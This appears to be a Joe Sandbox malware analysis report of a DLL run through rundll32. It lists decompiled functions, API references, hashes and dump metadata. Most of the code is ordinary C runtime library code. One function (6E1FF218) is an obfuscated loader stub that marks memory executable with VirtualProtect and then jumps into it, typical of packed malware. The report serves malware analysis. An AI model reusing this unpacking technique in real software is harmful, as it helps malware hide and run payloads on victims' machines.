std::_Facet_Register.LIBCPMT ref: 6E20A207
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A227
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A245

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
Instruction ID: 6e44de99da2cb1ebe52b4e5df4bd36382c4cfab6883d3680bdc0eca246e7b81f
Opcode Fuzzy Hash: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
Instruction Fuzzy Hash: 8311E3B690051E9FCF00EBE4C898AEDB77BAF44714F540919E4106B2D0DFB89A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D5FF, Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E6E24D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e2c51e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E24C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E254196(_t25, __eflags,  *0x6e2c51e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E24D33F(_t25, _t31, 0x6e2c76f0);
							E6E24CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E24CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E2462FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e2c51e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E24C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E254196(_t27, __eflags,  *0x6e2c51e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E24D33F(_t27, _t32, 0x6e2c76f0);
									E6E24CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E24CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E254140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E254140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x6e24d5ff
0x6e24d5ff
0x6e24d5ff
0x6e24d609
0x6e24d60b
0x6e24d610
0x6e24d613
0x6e24d621
0x6e24d628
0x6e24d62d
0x6e24d630
0x6e24d633
0x6e24d645
0x6e24d64a
0x6e24d64c
0x6e24d657
0x6e24d65e
0x6e24d663
0x6e24d666
0x6e24d668
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24d64e
0x6e24d64e
0x00000000
0x6e24d64e
0x6e24d635
0x6e24d635
0x6e24d636
0x6e24d636
0x6e24d63b
0x6e24d676
0x6e24d677
0x6e24d67d
0x6e24d682
0x6e24d685
0x6e24d686
0x6e24d687
0x6e24d68e
0x6e24d690
0x6e24d692
0x6e24d697
0x6e24d69a
0x6e24d6a8
0x6e24d6b4
0x6e24d6b7
0x6e24d6ba
0x6e24d6cc
0x6e24d6d1
0x6e24d6d3
0x6e24d6de
0x6e24d6e4
0x6e24d6ec
0x6e24d6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24d6d5
0x6e24d6d5
0x00000000
0x6e24d6d5
0x6e24d6bc
0x6e24d6bc
0x6e24d6bd
0x6e24d6bd
0x6e24d6f0
0x6e24d6f1
0x6e24d6f1
0x6e24d69c
0x6e24d6a2
0x6e24d6a6
0x6e24d6f9
0x6e24d6fa
0x6e24d700
0x00000000
0x00000000
0x00000000
0x6e24d6a6
0x6e24d707
0x6e24d707
0x6e24d615
0x6e24d61b
0x6e24d61f
0x6e24d66a
0x6e24d66b
0x6e24d675
0x00000000
0x00000000
0x00000000
0x6e24d61f

APIs

GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D603
_free.LIBCMT ref: 6E24D636
_free.LIBCMT ref: 6E24D65E
SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D66B
SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D677
_abort.LIBCMT ref: 6E24D67D

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 32e052e5f1fea9f104c0d2fee17bc169a37ac2248292001db495ceb1f0edf641
Instruction ID: 9a7cd09454368dbab1051a50c8191e7456ad7ac45acccf8267cc2d1e10e6fa86
Opcode Fuzzy Hash: 32e052e5f1fea9f104c0d2fee17bc169a37ac2248292001db495ceb1f0edf641
Instruction Fuzzy Hash: BBF0493904490DE7C78926F9EC0DF8A233F8BC2A66B244911F428D7184EFB488028874

Uniqueness

Uniqueness Score: -1.00%

Function 6E2075E8, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E2075E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6E2073A9( &_v16, _a4);
				E6E223D74( &_v16, 0x6e2c14fc);
				asm("int3");
				_push(_t35);
				E6E2073E3( &_v44, _v24);
				E6E223D74( &_v44, 0x6e2c1538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6E207426( &_v76, _v52);
				E6E223D74( &_v76, 0x6e2c15ac);
				asm("int3");
				_push(_t33);
				E6E1E1420( &_v68, _v48);
				E6E223D74( &_v68, 0x6e2c3450);
				asm("int3");
				return  &M6E26A3FC;
			}

0x6e2075eb
0x6e2075f4
0x6e207602
0x6e207607
0x6e207608
0x6e207614
0x6e207622
0x6e207627
0x6e207628
0x6e207629
0x6e207634
0x6e207642
0x6e207647
0x6e207648
0x6e207654
0x6e207662
0x6e207667
0x6e20766d

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E2075F4

Part of subcall function 6E2073A9: std::exception::exception.LIBCONCRT ref: 6E2073B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6E207602

Part of subcall function 6E223D74: RaiseException.KERNEL32(00000000,?,u n,00000000,?,?,?,?,?,?,?,6E2075E7,00000000,6E2C14C0,?), ref: 6E223DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E207614

Part of subcall function 6E2073E3: std::exception::exception.LIBCONCRT ref: 6E2073F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6E207622
std::regex_error::regex_error.LIBCPMT ref: 6E207634

Part of subcall function 6E207426: std::exception::exception.LIBCONCRT ref: 6E20743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6E207642

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
Instruction ID: bc20243a92160734bc8aa5ec56accde5d901f2cb113101ed41dab999bf1482eb
Opcode Fuzzy Hash: c793653b1028f631dfa089b8c65836f085f1ac10292c706ace307582354239e5
Instruction Fuzzy Hash: 44F0FE39C0010D7BCB05FBE4DC49CDDB77EAA14544F804A20AA1496591EB71A659C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FF218, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 216
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E1FF218(void* __ebx, signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t35;
				signed short _t37;
				void* _t45;
				intOrPtr _t46;
				signed int _t52;
				signed short _t60;
				signed char _t70;
				signed int _t73;
				signed char _t81;
				signed char _t84;
				signed short _t88;
				signed int _t97;
				void* _t99;
				signed int _t104;
				intOrPtr _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;
				signed char _t112;
				signed int _t114;
				signed int _t122;
				signed int _t128;
				signed int _t129;
				signed char _t133;
				signed int _t134;
				signed char _t135;
				signed int _t137;
				void* _t138;
				signed short* _t139;
				signed short* _t142;
				signed short _t144;
				void* _t149;
				void* _t152;
				void* _t154;
				void* _t155;

				_t35 =  *0x6e2c59e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t104 = __edx;
				_v20 = 0xf;
				_t128 =  *0x6e2c59d8; // 0x3040fed4
				_t142 = 0x6e2c59e6;
				_t137 =  *0x6e2c5a00; // 0x41f70a68
				_v24 = _t35;
				_v16 = __edx;
				do {
					if(_t128 != _t35) {
						L3:
						_t5 = _t128 + 5; // 0x3040fed9
						_t137 = _t137 * ( *_t142 & 0x0000ffff);
						_t37 =  *0x6e2c59f0; // 0x1ad70090
						_t106 = _t5 + _t137;
						 *0x6e2c5a90 = _t106;
						if(_t106 != (_t37 & 0x0000ffff)) {
							_t35 = _v24;
							_t104 = _v16;
							goto L5;
						}
					} else {
						_t149 =  *0x6e2c59dc - _t104; // 0x6
						if(_t149 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t142 =  &(_t142[1]);
				} while (_t142 < 0x6e2c5a44);
				_t143 = _v12 * 0x10e1d;
				 *0x6e2c5a00 = _t137;
				_t138 =  *0x6e2dc8d0; // 0x6e2c86a0
				 *0x6e2c5a04 = _t128 -  *0x6e2c5a04 + 0x11;
				 *0x6e2c8698 = _t138;
				 *0x6e2c59d8 = E6E2201E0(_v12 * 0x10e1d, 0, _t128,  *0x6e2c59dc);
				 *0x6e2c59dc = _t128;
				VirtualProtect(_t138, 0x305a, 0x40, 0x6e2c869c);
				_t129 =  *0x6e2c59d0; // 0x924fae9a
				_t45 = 6;
				_v24 = _t129;
				_t152 =  *0x6e2c5a02 - _t45; // 0x41f7
				if(_t152 == 0) {
					_t46 =  *0x6e2c5a90; // 0xcf71e0d2
					 *0x6e2c5a00 = _t46 + 0x11dde + _t129;
				} else {
					 *0x6e2c5a90 =  *0x6e2c5a90 +  ~_t129 -  *0x6e2c5a00 * 0x3d;
				}
				_t107 =  *0x6e2c59d8; // 0x3040fed4
				_t130 =  *0x6e2c59e6 & 0x0000ffff;
				_v5 = _t129 + _t107;
				if(( *0x6e2c59f2 & 0x0000ffff) + ( *0x6e2c59e6 & 0x0000ffff) != 0x32) {
					_t52 = E6E2201E0(_t143, 0, _t107,  *0x6e2c59dc);
					_v16 = _t52;
					_v20 = _t52 * 0x00000037 & 0x0000ffff;
				} else {
					_t97 =  *0x6e2c59dc; // 0x6
					_t99 = E6E2201E0(E6E2201E0(_t107, _t97, _t107, _t97), _t130, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t99 + _v12 + 0xf;
				}
				_t139 = 0x6e2c59e6;
				_t110 = _v16;
				_t133 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t133;
				 *0x6e2c5a04 = _t133;
				_t154 =  *0x6e2c5a04 - 0x1b47; // 0x70
				if(_t154 != 0) {
					_t60 = _v20;
				} else {
					asm("cdq");
					_t133 = _v24;
					_t122 = _t110 + ( *0x6e2c59e6 & 0x0000ffff);
					_v16 = _t122;
					_t60 = _v20 + _t122 * 2 + 0x3b;
				}
				_t111 = 6;
				_t155 =  *0x6e2c5a02 - _t111; // 0x41f7
				if(_t155 == 0) {
					 *0x6e2c5a00 = (_t60 & 0x0000ffff) + 0x11dde + (_t133 & 0x000000ff);
				}
				_t112 =  *0x6e2c59d0; // 0x924fae9a
				 *0x6e2c59dc =  *0x6e2c59dc & 0x00000000;
				_t144 = _v16 + 0x00000005 + _t112 & 0x0000ffff;
				 *0x6e2c59d8 = _t144 - _v12 - 0x54;
				 *0x6e2c59d0 = _t112 + 0x23bbc + (_t133 & 0x000000ff) * 2;
				 *0x6e2c8698();
				_t70 =  *0x6e2c59d0; // 0x924fae9a
				_t114 =  *0x6e2c5a04 & 0x000000ff;
				_t134 = _v12;
				 *0x6e2c59d8 =  *0x6e2c59d8 + _t70 + 0x3b + _t114;
				_t73 =  *0x6e2c59e6 & 0x0000ffff;
				asm("adc dword [0x6e2c59dc], 0x0");
				do {
					if(_t134 == _t73) {
						goto L22;
					} else {
						_t144 = ( *_t139 & 0x0000ffff) * (_t144 & 0x0000ffff) & 0x0000ffff;
						_t114 = _t134 + 5 + _t144;
						 *0x6e2c59dc = 0;
						_t88 =  *0x6e2c59f0; // 0x1ad70090
						asm("cdq");
						 *0x6e2c59d8 = _t114;
						if(_t114 != (_t88 & 0x0000ffff) || 0 != _t134) {
							_t73 =  *0x6e2c59e6 & 0x0000ffff;
							_t134 = _v12;
							goto L22;
						}
					}
					break;
					L22:
					_t139 =  &(_t139[1]);
				} while (_t139 < 0x6e2c5a44);
				asm("adc [edx+0x3b], esp");
				asm("outsb");
				_t135 =  *0x6e2c59d0; // 0x924fae9a
				_push(0);
				asm("adc [0x6e2c59dc], eax");
				 *0x6e2c59d8 = _t114 + (_t144 - _t114 * 0x0000003d - _v12 & 0x0000ffff) + 0x3b + _t135;
				_t81 = ((_t135 & 0x000000ff) * ( *0x6e2c5a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6e2c5a04 = _t81;
				_t84 = (_t81 & 0x000000ff) * 0x36 + _t135;
				 *0x6e2c59d0 = _t84;
				return _t84;
			}

0x6e1ff21e
0x6e1ff225
0x6e1ff228
0x6e1ff22a
0x6e1ff22c
0x6e1ff233
0x6e1ff239
0x6e1ff23f
0x6e1ff245
0x6e1ff248
0x6e1ff24b
0x6e1ff24d
0x6e1ff257
0x6e1ff25a
0x6e1ff25d
0x6e1ff260
0x6e1ff268
0x6e1ff26a
0x6e1ff272
0x6e1ff274
0x6e1ff277
0x00000000
0x6e1ff277
0x6e1ff24f
0x6e1ff24f
0x6e1ff255
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ff255
0x00000000
0x6e1ff27a
0x6e1ff27a
0x6e1ff27d
0x6e1ff28b
0x6e1ff29c
0x6e1ff2a2
0x6e1ff2a8
0x6e1ff2b2
0x6e1ff2ca
0x6e1ff2cf
0x6e1ff2d5
0x6e1ff2db
0x6e1ff2e3
0x6e1ff2e4
0x6e1ff2e7
0x6e1ff2ee
0x6e1ff305
0x6e1ff311
0x6e1ff2f0
0x6e1ff2fd
0x6e1ff2fd
0x6e1ff316
0x6e1ff31f
0x6e1ff326
0x6e1ff335
0x6e1ff36b
0x6e1ff370
0x6e1ff379
0x6e1ff337
0x6e1ff337
0x6e1ff34e
0x6e1ff356
0x6e1ff35c
0x6e1ff35c
0x6e1ff385
0x6e1ff395
0x6e1ff3a0
0x6e1ff3a2
0x6e1ff3a5
0x6e1ff3ab
0x6e1ff3b2
0x6e1ff3cf
0x6e1ff3b4
0x6e1ff3bb
0x6e1ff3bc
0x6e1ff3bf
0x6e1ff3c4
0x6e1ff3ca
0x6e1ff3ca
0x6e1ff3d4
0x6e1ff3d5
0x6e1ff3dc
0x6e1ff3eb
0x6e1ff3eb
0x6e1ff3f3
0x6e1ff3fc
0x6e1ff405
0x6e1ff416
0x6e1ff421
0x6e1ff426
0x6e1ff42c
0x6e1ff431
0x6e1ff43b
0x6e1ff440
0x6e1ff446
0x6e1ff44d
0x6e1ff454
0x6e1ff456
0x00000000
0x6e1ff458
0x6e1ff461
0x6e1ff469
0x6e1ff46d
0x6e1ff472
0x6e1ff47a
0x6e1ff47b
0x6e1ff483
0x6e1ff48b
0x6e1ff492
0x00000000
0x6e1ff492
0x6e1ff483
0x00000000
0x6e1ff495
0x6e1ff495
0x6e1ff498
0x6e1ff4a0
0x6e1ff4a9
0x6e1ff4aa
0x6e1ff4b3
0x6e1ff4c5
0x6e1ff4d2
0x6e1ff4e3
0x6e1ff4e6
0x6e1ff4f1
0x6e1ff4f3
0x6e1ff4f9

APIs

VirtualProtect.KERNEL32(6E2C86A0,0000305A,00000040,6E2C869C,?,00000000,3040FED4,008B1AD7,?), ref: 6E1FF2D5

Strings

DZ,n, xrefs: 6E1FF498
DZ,n, xrefs: 6E1FF27D
Y,n, xrefs: 6E1FF239
Y,n, xrefs: 6E1FF385

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZ,n$DZ,n$Y,n$Y,n
API String ID: 544645111-1993951851
Opcode ID: 46191d3b3ee2bc91f63fa3108c7ad4bae8af179177f879adf0169edaf738d5d9
Instruction ID: a5b7f911b7033b785ff07591207ce564b1f756772ad12d5d4be07b5ac90ca138
Opcode Fuzzy Hash: 46191d3b3ee2bc91f63fa3108c7ad4bae8af179177f879adf0169edaf738d5d9
Instruction Fuzzy Hash: AC8123719415518FCF88CF6AC88D6BC7BF6BB59B10B24815BE441D7380E378E581CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E2053EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6E2053EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t70;
				void* _t78;

				_t61 = __edx;
				E6E22014E(0x6e268264, __ebx, __edi, __esi, 0xa4);
				_t55 = __ecx;
				 *((intOrPtr*)(_t70 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x44)) = E6E241A3F(__ecx, __edx);
				_t35 = E6E2091D8(__ecx, __edx, _t78, _t70 - 0x80);
				_t58 = 0xb;
				memcpy(_t70 - 0x40, _t35, _t58 << 2);
				_t66 =  *((intOrPtr*)(_t70 - 0x44));
				_t79 =  *((char*)(_t70 + 0xc));
				 *((intOrPtr*)(_t55 + 8)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t13 = _t66 + 8; // 0x0
					 *((intOrPtr*)(_t70 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t70 - 0x48)) = 0x6e2794dd;
				}
				E6E2091D8(_t55, _t61, _t79, _t70 - 0x80);
				_push(_t70 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t55 + 8)) = E6E205B01(_t61, _t66, 0, _t70, _t79,  *((intOrPtr*)(_t70 - 0x48)));
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x10)) = E6E1E17AF(_t55, _t61, _t66, 0, _t70, _t79, "false", 0);
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x14)) = E6E1E17AF(_t55, _t61, _t66, 0, _t70, _t79, "true", 0);
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t28 = _t66 + 0x30; // 0x0
					 *((short*)(_t55 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t66 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
				} else {
					 *((short*)(_t55 + 0xc)) = E6E1E177E(0x2e, 0, _t70 - 0x40);
					_t49 = E6E1E177E(0x2c, 0, _t70 - 0x40);
				}
				 *((short*)(_t55 + 0xe)) = _t49;
				return E6E22009B(_t49, _t55, _t66, 0);
			}

0x6e2053eb
0x6e2053f5
0x6e2053fa
0x6e2053fc
0x6e205404
0x6e20540b
0x6e205413
0x6e205419
0x6e20541b
0x6e205420
0x6e205424
0x6e205427
0x6e20542a
0x6e20542d
0x6e205430
0x6e20543b
0x6e20543e
0x6e205432
0x6e205432
0x6e205432
0x6e205445
0x6e205451
0x6e205452
0x6e20545e
0x6e205464
0x6e205473
0x6e205479
0x6e205488
0x6e20548f
0x6e2054bf
0x6e2054c5
0x6e2054c9
0x6e2054cc
0x6e205491
0x6e2054a0
0x6e2054ab
0x6e2054b0
0x6e2054b3
0x6e2054bc

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6E2053F5
__Getcvt.LIBCPMT ref: 6E20540B
__Getcvt.LIBCPMT ref: 6E205445

Strings

false, xrefs: 6E205466
true, xrefs: 6E20547B

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
Instruction ID: 7531bd0d55aa755e4efd8bfd98f7d9ad7d5b170f848d142ec67f51e9ce84f4e5
Opcode Fuzzy Hash: cf873538ae9abfa7ba0f6e3f5c63ee4bf5c291a9d9cfcf3ab39a3c852cbb81e6
Instruction Fuzzy Hash: E7216DB6D0121CAFDB11CFE5C884ADEBBB9BF05710F04446AE9049F640EB709A95CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E24972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E249742
FreeLibrary.KERNEL32(00000000,?,?,?,6E2496A5,?,?,6E249645,?,6E2C2D28,0000000C,6E24978A), ref: 6E249765

Strings

mscoree.dll, xrefs: 6E249728
CorExitProcess, xrefs: 6E24973A

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
Instruction ID: 11d5c449a251d1c9f717f503511100945b597d2cf1bf1fc52f41c0e5bb53406a
Opcode Fuzzy Hash: 9104e660e4ef8e7cbd5607b7509a8559fa501d28631d6604808a370368a4d39c
Instruction Fuzzy Hash: B1F0AF7090052EFBDF419F90C958FAEBFBAEF05712F0081A8A905A6240DB319A40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E254E2A, Relevance: 7.7, APIs: 5, Instructions: 222
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E6E254E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6E231F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6E242281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
